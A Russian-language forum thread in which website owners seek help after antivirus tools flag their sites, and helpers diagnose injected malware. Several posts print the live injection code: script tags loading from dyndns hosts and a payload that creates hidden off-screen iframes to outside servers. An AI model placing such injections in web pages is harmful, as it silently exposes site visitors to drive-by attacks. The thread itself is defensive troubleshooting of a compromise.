[Delirium]

][alter, не вижу проблемы... На сайт не ругается, подвал вроде бы в порядке... А лечится это, как и обычные вирусы - антивирусом. Приведи скрин "ругания" антивируса.

[Sham]

][alter, приведите подробности, а то будет бан по п. 3.4

[][alter]

Сегодня я уже попал в под фильтр оперы ((.

В подвале явно что то чужеродное так как он сломан.

Но я не могу найти где что ((


Скрины:

http://imageshack.us/photo/my-images/171/83474025.jpg/

http://imageshack.us/photo/my-images/823/63180071.jpg/

На работе сегодня антивирус не ругается. Буду дома проверю как там дела обстоят.

[LilLoco]

При заходе на сайт, антивирус NOD, находит угрозу HTML/iframe.B.Gen.

[][alter]

Да у меня именно nod32 ругается. Как с этим бороться и самое главное как туда это попало?

[Sham]

в DOM нашел это

Код:

<script src="http://u4a.dyndns.tv/followbb.php?i=19703" language="JavaScript">
Reload the page to get source for: http://u4a.dyndns.tv/followbb.php?i=19703
</script>

грузит это

Код:

var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://sell00.dyndns-ip.com/main.php?page=7f8d1ec15718a56f'; document.body.appendChild(frame); var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://178.63.96.144/?rbb'; document.body.appendChild(frame); var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://u4a.dyndns.tv/?inid=19703&intime=657645061'; document.body.appendChild(frame);

смотрите в скриптах, шаблонах, флешках и т.д.

в шаблоне он просто

Код:

<script language='JavaScript' src='http://u4a.dyndns.tv/followbb.php?i=19703'></script>

тот код я с фаербага скопировал (лишний текст)...

Проблема не столько в самом ифрейме, сколько в возможности добавить что угодно в шаблон. Смотрите дыры в движке и исправляйте, иначе потеряете данные.

[][alter]

Нашел в index.php.

Цитата:

Проблема не столько в самом ифрейме, сколько в возможности добавить что угодно в шаблон. Смотрите дыры в движке и исправляйте, иначе потеряете данные.

Уже пропадали полностью данные с базы данных, приходилось восстанавливать из бекапа.

[Gudzon2]

Учитывая что мне уже неплохо помогли на озоне, снова обращаюсь за помощью.
Мое почтение Уважаемые знатоки! Сегодня мне пришло сообщение от Яндекса, что у меня вирус на сайте.
Проверял сайт на вирус тотале, все по нолям.
Решил сам просмотреть через IE HTML своей страницы и обнаружил такую вещь.

Цитата:

<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="#" xml:lang="ru" lang="ru"> <link rel="stylesheet" type="text/css" href="/templates/Zevs/css/menu.css"/> <head> <div style='z-index:1000; position: fixed; top:90%; right:0px'> <SCRIPT Language="javascript">

Вот эта хрень и определяется как вирус http://wildfuckers.dyndns.ws/showforum.php?pid=54543
Подскажите пожалуйста, исходя из приведенного куска кода, где мне искать эту падлюку. Сам увы найти не могу.
Помогите пожалуйста!
Могу в случае необходимости залить куда нибуть весь код.
PS Методом тыка выяснилось, что этот код видно,только когда заходишь на сайт без логина своего. Просто как посетитель без аккаунта.

[Severny]

<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script>
Это.
Гугли по этому коду.
Ищи ошибки в модулях CMS.
Прикрывай дырку.